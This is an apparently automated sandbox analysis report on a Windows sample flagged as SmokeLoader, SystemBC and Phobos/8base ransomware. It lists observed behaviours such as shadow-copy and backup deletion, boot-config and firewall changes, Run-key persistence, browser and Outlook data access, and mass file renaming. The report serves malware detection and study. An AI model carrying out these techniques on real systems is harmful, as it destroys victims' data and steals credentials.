Malware Analysis Report

2024-11-16 12:15

Sample ID 230625-dxzegaea7v
Target e142f4e8eb3fb4323fb377138f53db66e3e6ec9e82930f4b23dd91a5f7bd45d0
SHA256 e142f4e8eb3fb4323fb377138f53db66e3e6ec9e82930f4b23dd91a5f7bd45d0
Tags
smokeloader backdoor trojan phobos systembc agilenet collection evasion persistence ransomware spyware stealer themida
score
10/10

Table of Contents

Analysis Overview

MITRE ATT&CK

Enterprise Matrix V6

Analysis: static1

Detonation Overview

Signatures

Analysis: behavioral1

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral2

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis Overview

score
10/10

SHA256

e142f4e8eb3fb4323fb377138f53db66e3e6ec9e82930f4b23dd91a5f7bd45d0

Threat Level: Known bad

The file e142f4e8eb3fb4323fb377138f53db66e3e6ec9e82930f4b23dd91a5f7bd45d0 was found to be: Known bad.

Malicious Activity Summary

SmokeLoader

SystemBC

Phobos

Deletes shadow copies

Identifies VirtualBox via ACPI registry values (likely anti-VM)

Modifies boot configuration data using bcdedit

Renames multiple (456) files with added filename extension

Deletes backup catalog

Downloads MZ/PE file

Modifies Windows Firewall

Loads dropped DLL

Themida packer

Executes dropped EXE

Obfuscated with Agile.Net obfuscator

Checks computer location settings

Reads user/profile data of web browsers

Drops startup file

Checks BIOS information in registry

Checks whether UAC is enabled

Drops desktop.ini file(s)

Accesses Microsoft Outlook profiles

Adds Run key to start application

Suspicious use of SetThreadContext

Drops file in Program Files directory

Enumerates physical storage devices

Program crash

Unsigned PE

outlook_win_path

Uses Volume Shadow Copy service COM API

Suspicious use of WriteProcessMemory

Suspicious behavior: MapViewOfSection

Uses Task Scheduler COM API

Suspicious behavior: EnumeratesProcesses

Checks SCSI registry key(s)

Suspicious behavior: GetForegroundWindowSpam

Modifies registry class

Interacts with shadow copies

outlook_office_path

Suspicious use of AdjustPrivilegeToken

MITRE ATT&CK

Analysis: static1

Detonation Overview

Reported

2023-06-25 03:23

Signatures

Unsigned PE

Description Indicator Process Target
N/A N/A N/A N/A

Analysis: behavioral1

Detonation Overview

Submitted

2023-06-25 03:23

Reported

2023-06-25 03:25

Platform

win7-20230621-en

Max time kernel

66s

Max time network

34s

Command Line

"C:\Users\Admin\AppData\Local\Temp\e142f4e8eb3fb4323fb377138f53db66e3e6ec9e82930f4b23dd91a5f7bd45d0.exe"

Signatures

SmokeLoader

trojan backdoor smokeloader

Checks SCSI registry key(s)

Description Indicator Process Target
Key enumerated \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI C:\Users\Admin\AppData\Local\Temp\e142f4e8eb3fb4323fb377138f53db66e3e6ec9e82930f4b23dd91a5f7bd45d0.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI C:\Users\Admin\AppData\Local\Temp\e142f4e8eb3fb4323fb377138f53db66e3e6ec9e82930f4b23dd91a5f7bd45d0.exe N/A
Key queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI C:\Users\Admin\AppData\Local\Temp\e142f4e8eb3fb4323fb377138f53db66e3e6ec9e82930f4b23dd91a5f7bd45d0.exe N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\e142f4e8eb3fb4323fb377138f53db66e3e6ec9e82930f4b23dd91a5f7bd45d0.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\e142f4e8eb3fb4323fb377138f53db66e3e6ec9e82930f4b23dd91a5f7bd45d0.exe N/A

Suspicious behavior: GetForegroundWindowSpam

Description Indicator Process Target
N/A N/A N/A N/A

Suspicious behavior: MapViewOfSection

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\e142f4e8eb3fb4323fb377138f53db66e3e6ec9e82930f4b23dd91a5f7bd45d0.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 1696 wrote to memory of 1320 N/A C:\Users\Admin\AppData\Local\Temp\e142f4e8eb3fb4323fb377138f53db66e3e6ec9e82930f4b23dd91a5f7bd45d0.exe C:\Users\Admin\AppData\Local\Temp\e142f4e8eb3fb4323fb377138f53db66e3e6ec9e82930f4b23dd91a5f7bd45d0.exe
PID 1696 wrote to memory of 1320 N/A C:\Users\Admin\AppData\Local\Temp\e142f4e8eb3fb4323fb377138f53db66e3e6ec9e82930f4b23dd91a5f7bd45d0.exe C:\Users\Admin\AppData\Local\Temp\e142f4e8eb3fb4323fb377138f53db66e3e6ec9e82930f4b23dd91a5f7bd45d0.exe
PID 1696 wrote to memory of 1320 N/A C:\Users\Admin\AppData\Local\Temp\e142f4e8eb3fb4323fb377138f53db66e3e6ec9e82930f4b23dd91a5f7bd45d0.exe C:\Users\Admin\AppData\Local\Temp\e142f4e8eb3fb4323fb377138f53db66e3e6ec9e82930f4b23dd91a5f7bd45d0.exe
PID 1696 wrote to memory of 1320 N/A C:\Users\Admin\AppData\Local\Temp\e142f4e8eb3fb4323fb377138f53db66e3e6ec9e82930f4b23dd91a5f7bd45d0.exe C:\Users\Admin\AppData\Local\Temp\e142f4e8eb3fb4323fb377138f53db66e3e6ec9e82930f4b23dd91a5f7bd45d0.exe
PID 1696 wrote to memory of 1320 N/A C:\Users\Admin\AppData\Local\Temp\e142f4e8eb3fb4323fb377138f53db66e3e6ec9e82930f4b23dd91a5f7bd45d0.exe C:\Users\Admin\AppData\Local\Temp\e142f4e8eb3fb4323fb377138f53db66e3e6ec9e82930f4b23dd91a5f7bd45d0.exe
PID 1696 wrote to memory of 1320 N/A C:\Users\Admin\AppData\Local\Temp\e142f4e8eb3fb4323fb377138f53db66e3e6ec9e82930f4b23dd91a5f7bd45d0.exe C:\Users\Admin\AppData\Local\Temp\e142f4e8eb3fb4323fb377138f53db66e3e6ec9e82930f4b23dd91a5f7bd45d0.exe
PID 1696 wrote to memory of 1320 N/A C:\Users\Admin\AppData\Local\Temp\e142f4e8eb3fb4323fb377138f53db66e3e6ec9e82930f4b23dd91a5f7bd45d0.exe C:\Users\Admin\AppData\Local\Temp\e142f4e8eb3fb4323fb377138f53db66e3e6ec9e82930f4b23dd91a5f7bd45d0.exe

Processes

C:\Users\Admin\AppData\Local\Temp\e142f4e8eb3fb4323fb377138f53db66e3e6ec9e82930f4b23dd91a5f7bd45d0.exe

"C:\Users\Admin\AppData\Local\Temp\e142f4e8eb3fb4323fb377138f53db66e3e6ec9e82930f4b23dd91a5f7bd45d0.exe"

C:\Users\Admin\AppData\Local\Temp\e142f4e8eb3fb4323fb377138f53db66e3e6ec9e82930f4b23dd91a5f7bd45d0.exe

"C:\Users\Admin\AppData\Local\Temp\e142f4e8eb3fb4323fb377138f53db66e3e6ec9e82930f4b23dd91a5f7bd45d0.exe"

Network

N/A

Files

memory/1696-54-0x0000000000220000-0x0000000000235000-memory.dmp

memory/1320-55-0x000000007EFDE000-0x000000007EFDF000-memory.dmp

memory/1320-56-0x0000000000400000-0x0000000000409000-memory.dmp

memory/1696-57-0x0000000000240000-0x0000000000249000-memory.dmp

memory/1320-58-0x0000000000400000-0x0000000000409000-memory.dmp

memory/1320-60-0x0000000000400000-0x0000000000409000-memory.dmp

memory/1356-59-0x0000000002740000-0x0000000002756000-memory.dmp

Analysis: behavioral2

Detonation Overview

Submitted

2023-06-25 03:23

Reported

2023-06-25 03:26

Platform

win10v2004-20230621-en

Max time kernel

88s

Max time network

117s

Command Line

"C:\Users\Admin\AppData\Local\Temp\e142f4e8eb3fb4323fb377138f53db66e3e6ec9e82930f4b23dd91a5f7bd45d0.exe"

Signatures

Phobos

ransomware phobos

SmokeLoader

trojan backdoor smokeloader

SystemBC

trojan systembc

Deletes shadow copies

ransomware

Identifies VirtualBox via ACPI registry values (likely anti-VM)

evasion
Description Indicator Process Target
Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ C:\Users\Admin\AppData\Local\Temp\F9AA.exe N/A

Modifies boot configuration data using bcdedit

ransomware evasion
Description Indicator Process Target
N/A N/A C:\Windows\system32\bcdedit.exe N/A
N/A N/A C:\Windows\system32\bcdedit.exe N/A
N/A N/A C:\Windows\system32\bcdedit.exe N/A
N/A N/A C:\Windows\system32\bcdedit.exe N/A

Renames multiple (456) files with added filename extension

ransomware

Deletes backup catalog

ransomware
Description Indicator Process Target
N/A N/A C:\Windows\system32\wbadmin.exe N/A
N/A N/A C:\Windows\system32\wbadmin.exe N/A

Downloads MZ/PE file

Modifies Windows Firewall

evasion
Description Indicator Process Target
N/A N/A C:\Windows\system32\netsh.exe N/A
N/A N/A C:\Windows\system32\netsh.exe N/A

Checks BIOS information in registry

Description Indicator Process Target
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion C:\Users\Admin\AppData\Local\Temp\F9AA.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion C:\Users\Admin\AppData\Local\Temp\F9AA.exe N/A

Checks computer location settings

Description Indicator Process Target
Key value queried \REGISTRY\USER\S-1-5-21-4129409437-3162877118-52503038-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Local\Temp\F9AA.exe N/A

Drops startup file

Description Indicator Process Target
File created \??\c:\users\admin\appdata\roaming\microsoft\windows\start menu\programs\startup\E9AA.exe C:\Users\Admin\AppData\Local\Temp\E9AA.exe N/A

Loads dropped DLL

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\F9AA.exe N/A

Obfuscated with Agile.Net obfuscator

agilenet

Reads user/profile data of web browsers

spyware stealer

Themida packer

themida

Accesses Microsoft Outlook profiles

collection
Description Indicator Process Target
Key opened \REGISTRY\USER\S-1-5-21-4129409437-3162877118-52503038-1000\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 C:\Windows\SysWOW64\explorer.exe N/A
Key opened \REGISTRY\USER\S-1-5-21-4129409437-3162877118-52503038-1000\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 C:\Windows\SysWOW64\explorer.exe N/A
Key opened \REGISTRY\USER\S-1-5-21-4129409437-3162877118-52503038-1000\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 C:\Windows\SysWOW64\explorer.exe N/A

Adds Run key to start application

persistence
Description Indicator Process Target
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\E9AA = "C:\\Users\\Admin\\AppData\\Local\\E9AA.exe" C:\Users\Admin\AppData\Local\Temp\E9AA.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-4129409437-3162877118-52503038-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\E9AA = "C:\\Users\\Admin\\AppData\\Local\\E9AA.exe" C:\Users\Admin\AppData\Local\Temp\E9AA.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-4129409437-3162877118-52503038-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Riqyrsb = "C:\\Users\\Admin\\AppData\\Roaming\\Riqyrsb.exe" C:\Users\Admin\AppData\Local\Temp\E709.exe N/A

Checks whether UAC is enabled

evasion trojan
Description Indicator Process Target
Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA C:\Users\Admin\AppData\Local\Temp\F9AA.exe N/A

Drops desktop.ini file(s)

Description Indicator Process Target
File opened for modification C:\ProgramData\Microsoft\Windows\Start Menu\Programs\desktop.ini C:\Users\Admin\AppData\Local\Temp\E9AA.exe N/A
File opened for modification C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Maintenance\Desktop.ini C:\Users\Admin\AppData\Local\Temp\E9AA.exe N/A
File opened for modification F:\$RECYCLE.BIN\S-1-5-21-4129409437-3162877118-52503038-1000\desktop.ini C:\Users\Admin\AppData\Local\Temp\E9AA.exe N/A
File opened for modification C:\Program Files\Microsoft Office\root\Office16\1033\DataServices\DESKTOP.INI C:\Users\Admin\AppData\Local\Temp\E9AA.exe N/A
File opened for modification C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Accessibility\desktop.ini C:\Users\Admin\AppData\Local\Temp\E9AA.exe N/A
File opened for modification C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Administrative Tools\desktop.ini C:\Users\Admin\AppData\Local\Temp\E9AA.exe N/A
File opened for modification C:\Users\Admin\3D Objects\desktop.ini C:\Users\Admin\AppData\Local\Temp\E9AA.exe N/A
File opened for modification C:\Program Files\desktop.ini C:\Users\Admin\AppData\Local\Temp\E9AA.exe N/A
File opened for modification C:\Program Files (x86)\desktop.ini C:\Users\Admin\AppData\Local\Temp\E9AA.exe N/A
File opened for modification C:\ProgramData\Microsoft\Windows\Start Menu\desktop.ini C:\Users\Admin\AppData\Local\Temp\E9AA.exe N/A
File opened for modification C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Accessories\System Tools\desktop.ini C:\Users\Admin\AppData\Local\Temp\E9AA.exe N/A
File opened for modification C:\$Recycle.Bin\S-1-5-21-4129409437-3162877118-52503038-1000\desktop.ini C:\Users\Admin\AppData\Local\Temp\E9AA.exe N/A
File opened for modification C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Accessories\desktop.ini C:\Users\Admin\AppData\Local\Temp\E9AA.exe N/A
File opened for modification C:\ProgramData\Microsoft\Windows\Start Menu\Programs\System Tools\desktop.ini C:\Users\Admin\AppData\Local\Temp\E9AA.exe N/A
File opened for modification C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Windows PowerShell\desktop.ini C:\Users\Admin\AppData\Local\Temp\E9AA.exe N/A
File opened for modification C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\desktop.ini C:\Users\Admin\AppData\Local\Temp\E9AA.exe N/A

Drops file in Program Files directory

Description Indicator Process Target
File created C:\Program Files\Microsoft Office\root\Office16\ADDINS\EduWorks Data Streamer Add-In\System.Runtime.InteropServices.RuntimeInformation.dll.id[BEF4EEF6-3483].[[email protected]].8base C:\Users\Admin\AppData\Local\Temp\E9AA.exe N/A
File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\s_sortedby_up_hover_18.svg C:\Users\Admin\AppData\Local\Temp\E9AA.exe N/A
File created C:\Program Files\Java\jdk1.8.0_66\lib\visualvm\platform\config\Modules\org-netbeans-modules-options-api.xml.id[BEF4EEF6-3483].[[email protected]].8base C:\Users\Admin\AppData\Local\Temp\E9AA.exe N/A
File created C:\Program Files\Microsoft Office\root\Office16\ADDINS\Microsoft Power Query for Excel Integrated\bin\Microsoft.Mashup.OleDbInterop.dll.id[BEF4EEF6-3483].[[email protected]].8base C:\Users\Admin\AppData\Local\Temp\E9AA.exe N/A
File opened for modification C:\Program Files\Microsoft Office\root\vfs\ProgramFilesCommonX64\Microsoft Shared\THEMES16\CONCRETE\CONCRETE.ELM C:\Users\Admin\AppData\Local\Temp\E9AA.exe N/A
File opened for modification C:\Program Files\WindowsApps\Microsoft.MicrosoftOfficeHub_18.1903.1152.0_neutral_split.scale-100_8wekyb3d8bbwe\images\Square310x310Logo.scale-100.png C:\Users\Admin\AppData\Local\Temp\E9AA.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\ResiliencyLinks\VisualElements\LogoBeta.png.DATA C:\Users\Admin\AppData\Local\Temp\E9AA.exe N/A
File created C:\Program Files\Java\jdk1.8.0_66\jre\bin\dt_socket.dll.id[BEF4EEF6-3483].[[email protected]].8base C:\Users\Admin\AppData\Local\Temp\E9AA.exe N/A
File opened for modification C:\Program Files\WindowsApps\Microsoft.DesktopAppInstaller_1.0.30251.0_x64__8wekyb3d8bbwe\Assets\AppPackageAppList.targetsize-80_altform-unplated.png C:\Users\Admin\AppData\Local\Temp\E9AA.exe N/A
File opened for modification C:\Program Files\WindowsApps\Microsoft.DesktopAppInstaller_1.0.30251.0_x64__8wekyb3d8bbwe\Assets\AppPackageAppList.targetsize-64_altform-unplated.png C:\Users\Admin\AppData\Local\Temp\E9AA.exe N/A
File opened for modification C:\Program Files\WindowsApps\Microsoft.MicrosoftSolitaireCollection_4.4.8204.0_x64__8wekyb3d8bbwe\SolitaireLiveTileUpdater.dll C:\Users\Admin\AppData\Local\Temp\E9AA.exe N/A
File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\com.jrockit.mc.console.historicaldata.zh_CN_5.5.0.165303.jar C:\Users\Admin\AppData\Local\Temp\E9AA.exe N/A
File opened for modification C:\Program Files\Microsoft Office\root\Document Themes 16\Theme Fonts\Corbel.xml C:\Users\Admin\AppData\Local\Temp\E9AA.exe N/A
File created C:\Program Files\Microsoft Office\root\Licenses16\Personal2019R_OEM_Perp-ul-oob.xrm-ms.id[BEF4EEF6-3483].[[email protected]].8base C:\Users\Admin\AppData\Local\Temp\E9AA.exe N/A
File opened for modification C:\Program Files\WindowsApps\Microsoft.SkypeApp_14.53.77.0_x64__kzf8qxf38zg5c\Assets\Audio\Skype_File_Transfer_Complete.m4a C:\Users\Admin\AppData\Local\Temp\E9AA.exe N/A
File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\reviews\js\nls\cs-cz\ui-strings.js.id[BEF4EEF6-3483].[[email protected]].8base C:\Users\Admin\AppData\Local\Temp\E9AA.exe N/A
File opened for modification C:\Program Files (x86)\Common Files\Microsoft Shared\ink\fr-FR\TabTip32.exe.mui C:\Users\Admin\AppData\Local\Temp\E9AA.exe N/A
File created C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\org.eclipse.e4.ui.workbench.swt.nl_ja_4.4.0.v20140623020002.jar.id[BEF4EEF6-3483].[[email protected]].8base C:\Users\Admin\AppData\Local\Temp\E9AA.exe N/A
File opened for modification C:\Program Files\Microsoft Office\root\Office16\ADDINS\PowerPivot Excel Add-in\Microsoft.Excel.ReportingServices.QueryDesigners.Extensions.dll.id[BEF4EEF6-3483].[[email protected]].8base C:\Users\Admin\AppData\Local\Temp\E9AA.exe N/A
File created C:\Program Files\VideoLAN\VLC\plugins\video_filter\libcolorthres_plugin.dll.id[BEF4EEF6-3483].[[email protected]].8base C:\Users\Admin\AppData\Local\Temp\E9AA.exe N/A
File created C:\Program Files\Microsoft Office\root\Licenses16\VisioStdCO365R_SubTrial-pl.xrm-ms.id[BEF4EEF6-3483].[[email protected]].8base C:\Users\Admin\AppData\Local\Temp\E9AA.exe N/A
File opened for modification C:\Program Files\Microsoft Office\root\vfs\ProgramFilesCommonX64\Microsoft Shared\VBA\VBA7.1\VBEUI.DLL.id[BEF4EEF6-3483].[[email protected]].8base C:\Users\Admin\AppData\Local\Temp\E9AA.exe N/A
File created C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\org.eclipse.text.nl_zh_4.4.0.v20140623020002.jar.id[BEF4EEF6-3483].[[email protected]].8base C:\Users\Admin\AppData\Local\Temp\E9AA.exe N/A
File created C:\Program Files\Microsoft Office\root\Office16\sdxs\FA000000027\assets\Icons\[email protected][BEF4EEF6-3483].[[email protected]].8base C:\Users\Admin\AppData\Local\Temp\E9AA.exe N/A
File opened for modification C:\Program Files\Microsoft Office\root\Office16\protocolhandler.exe.id[BEF4EEF6-3483].[[email protected]].8base C:\Users\Admin\AppData\Local\Temp\E9AA.exe N/A
File created C:\Program Files\Java\jdk1.8.0_66\lib\visualvm\platform\modules\locale\org-openide-windows_zh_CN.jar.id[BEF4EEF6-3483].[[email protected]].8base C:\Users\Admin\AppData\Local\Temp\E9AA.exe N/A
File created C:\Program Files\Java\jdk1.8.0_66\lib\visualvm\visualvm\modules\com-sun-tools-visualvm-coredump.jar.id[BEF4EEF6-3483].[[email protected]].8base C:\Users\Admin\AppData\Local\Temp\E9AA.exe N/A
File created C:\Program Files\Microsoft Office\root\Licenses16\O365ProPlusR_SubTrial3-ul-oob.xrm-ms.id[BEF4EEF6-3483].[[email protected]].8base C:\Users\Admin\AppData\Local\Temp\E9AA.exe N/A
File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\fss\img\tools\check.cur.id[BEF4EEF6-3483].[[email protected]].8base C:\Users\Admin\AppData\Local\Temp\E9AA.exe N/A
File created C:\Program Files\Microsoft Office\root\Licenses16\O365HomePremR_SubTrial5-ppd.xrm-ms.id[BEF4EEF6-3483].[[email protected]].8base C:\Users\Admin\AppData\Local\Temp\E9AA.exe N/A
File created C:\Program Files\Microsoft Office\root\Office16\LogoImages\WinWordLogo.scale-80.png.id[BEF4EEF6-3483].[[email protected]].8base C:\Users\Admin\AppData\Local\Temp\E9AA.exe N/A
File opened for modification C:\Program Files\WindowsPowerShell\Modules\PackageManagement\1.0.0.1\Microsoft.PackageManagement.MetaProvider.PowerShell.dll C:\Users\Admin\AppData\Local\Temp\E9AA.exe N/A
File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\exportpdfupsell-app\images\rhp_world_icon_hover.png.id[BEF4EEF6-3483].[[email protected]].8base C:\Users\Admin\AppData\Local\Temp\E9AA.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\ResiliencyLinks\VisualElements\SmallLogoDev.png.DATA C:\Users\Admin\AppData\Local\Temp\E9AA.exe N/A
File opened for modification C:\Program Files\Microsoft Office\root\Licenses16\ProPlus2019R_OEM_Perp6-ppd.xrm-ms C:\Users\Admin\AppData\Local\Temp\E9AA.exe N/A
File created C:\Program Files\Microsoft Office\root\vfs\ProgramFilesCommonX64\Microsoft Shared\THEMES16\AXIS\PREVIEW.GIF.id[BEF4EEF6-3483].[[email protected]].8base C:\Users\Admin\AppData\Local\Temp\E9AA.exe N/A
File opened for modification C:\Program Files\WindowsApps\Microsoft.Windows.Photos_2019.19071.12548.0_x64__8wekyb3d8bbwe\Assets\PhotosAppList.targetsize-48_altform-colorize.png C:\Users\Admin\AppData\Local\Temp\E9AA.exe N/A
File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\exportpdfupsell-app\js\nls\ro-ro\ui-strings.js C:\Users\Admin\AppData\Local\Temp\E9AA.exe N/A
File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\logo_retina.png.id[BEF4EEF6-3483].[[email protected]].8base C:\Users\Admin\AppData\Local\Temp\E9AA.exe N/A
File opened for modification C:\Program Files\7-Zip\Lang\mk.txt C:\Users\Admin\AppData\Local\Temp\E9AA.exe N/A
File created C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\com.jrockit.mc.console.ui.notification_5.5.0.165303\html\dcommon\gifs\doclib.gif.id[BEF4EEF6-3483].[[email protected]].8base C:\Users\Admin\AppData\Local\Temp\E9AA.exe N/A
File created C:\Program Files\Microsoft Office\root\Templates\1033\EssentialLetter.dotx.id[BEF4EEF6-3483].[[email protected]].8base C:\Users\Admin\AppData\Local\Temp\E9AA.exe N/A
File created C:\Program Files\Microsoft Office\root\vfs\ProgramFilesCommonX64\Microsoft Shared\THEMES16\COMPASS\COMPASS.ELM.id[BEF4EEF6-3483].[[email protected]].8base C:\Users\Admin\AppData\Local\Temp\E9AA.exe N/A
File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\unified-share\images\themes\dark\s_checkbox_unselected_18.svg C:\Users\Admin\AppData\Local\Temp\E9AA.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\BHO\ie_to_edge_bho_64.dll C:\Users\Admin\AppData\Local\Temp\E9AA.exe N/A
File opened for modification C:\Program Files\Microsoft Office\root\Office16\LogoImages\PowerPntLogoSmall.contrast-white_scale-180.png C:\Users\Admin\AppData\Local\Temp\E9AA.exe N/A
File created C:\Program Files\Microsoft Office\root\Office16\PAGESIZE\PGLBL111.XML.id[BEF4EEF6-3483].[[email protected]].8base C:\Users\Admin\AppData\Local\Temp\E9AA.exe N/A
File created C:\Program Files\Mozilla Firefox\dependentlibs.list.id[BEF4EEF6-3483].[[email protected]].8base C:\Users\Admin\AppData\Local\Temp\E9AA.exe N/A
File created C:\Program Files\Mozilla Firefox\softokn3.dll.id[BEF4EEF6-3483].[[email protected]].8base C:\Users\Admin\AppData\Local\Temp\E9AA.exe N/A
File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\add-account\js\nls\zh-tw\ui-strings.js.id[BEF4EEF6-3483].[[email protected]].8base C:\Users\Admin\AppData\Local\Temp\E9AA.exe N/A
File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\reviews\js\nls\en-il\ui-strings.js.id[BEF4EEF6-3483].[[email protected]].8base C:\Users\Admin\AppData\Local\Temp\E9AA.exe N/A
File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\scan-files\js\nls\zh-tw\ui-strings.js C:\Users\Admin\AppData\Local\Temp\E9AA.exe N/A
File opened for modification C:\Program Files\Microsoft Office\root\vfs\ProgramFilesX86\Microsoft Office\Office16\api-ms-win-crt-filesystem-l1-1-0.dll C:\Users\Admin\AppData\Local\Temp\E9AA.exe N/A
File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\generic-rhp-app\css\main.css C:\Users\Admin\AppData\Local\Temp\E9AA.exe N/A
File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\add-account\js\nls\cs-cz\ui-strings.js.id[BEF4EEF6-3483].[[email protected]].8base C:\Users\Admin\AppData\Local\Temp\E9AA.exe N/A
File opened for modification C:\Program Files\Microsoft Office\root\Licenses16\HomeBusinessR_Retail2-ul-oob.xrm-ms C:\Users\Admin\AppData\Local\Temp\E9AA.exe N/A
File opened for modification C:\Program Files\Microsoft Office\root\Licenses16\Personal2019R_Retail-pl.xrm-ms C:\Users\Admin\AppData\Local\Temp\E9AA.exe N/A
File opened for modification C:\Program Files\Microsoft Office\root\Office16\ONENOTEIMP.DLL.id[BEF4EEF6-3483].[[email protected]].8base C:\Users\Admin\AppData\Local\Temp\E9AA.exe N/A
File opened for modification C:\Program Files\WindowsPowerShell\Modules\Pester\3.4.0\Snippets\ShouldMatch.snippets.ps1xml C:\Users\Admin\AppData\Local\Temp\E9AA.exe N/A
File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\scan-files\images\themeless\Playstore\zh-hk_get.svg C:\Users\Admin\AppData\Local\Temp\E9AA.exe N/A
File opened for modification C:\Program Files (x86)\WindowsPowerShell\Modules\Pester\3.4.0\Functions\Assertions\Match.Tests.ps1 C:\Users\Admin\AppData\Local\Temp\E9AA.exe N/A
File opened for modification C:\Program Files\VideoLAN\VLC\locale\ne\LC_MESSAGES\vlc.mo C:\Users\Admin\AppData\Local\Temp\E9AA.exe N/A
File opened for modification C:\Program Files\WindowsApps\DeletedAllUserPackages\Microsoft.WindowsStore_11910.1002.5.0_neutral_split.scale-100_8wekyb3d8bbwe\Assets\AppTiles\LibrarySquare150x150Logo.scale-100.png C:\Users\Admin\AppData\Local\Temp\E9AA.exe N/A
File created C:\Program Files\VideoLAN\VLC\plugins\control\libwin_msg_plugin.dll.id[BEF4EEF6-3483].[[email protected]].8base C:\Users\Admin\AppData\Local\Temp\E9AA.exe N/A

Enumerates physical storage devices

Program crash

Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\WerFault.exe C:\Users\Admin\AppData\Local\Temp\E9AA.exe

Checks SCSI registry key(s)

Description Indicator Process Target
Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\FriendlyName C:\Windows\System32\vds.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CDROM&VEN_DADY&PROD_DADY_DVD-ROM\4&215468A5&0&010000 C:\Windows\System32\vds.exe N/A
Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_DADY&Prod_DADY_DVD-ROM\4&215468a5&0&010000\FriendlyName C:\Windows\System32\vds.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI C:\Users\Admin\AppData\Local\Temp\e142f4e8eb3fb4323fb377138f53db66e3e6ec9e82930f4b23dd91a5f7bd45d0.exe N/A
Key queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI C:\Users\Admin\AppData\Local\Temp\e142f4e8eb3fb4323fb377138f53db66e3e6ec9e82930f4b23dd91a5f7bd45d0.exe N/A
Key enumerated \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI C:\Users\Admin\AppData\Local\Temp\e142f4e8eb3fb4323fb377138f53db66e3e6ec9e82930f4b23dd91a5f7bd45d0.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\DISK&VEN_DADY&PROD_HARDDISK\4&215468A5&0&000000 C:\Windows\System32\vds.exe N/A

Interacts with shadow copies

ransomware
Description Indicator Process Target
N/A N/A C:\Windows\system32\vssadmin.exe N/A
N/A N/A C:\Windows\system32\vssadmin.exe N/A

Modifies registry class

Description Indicator Process Target
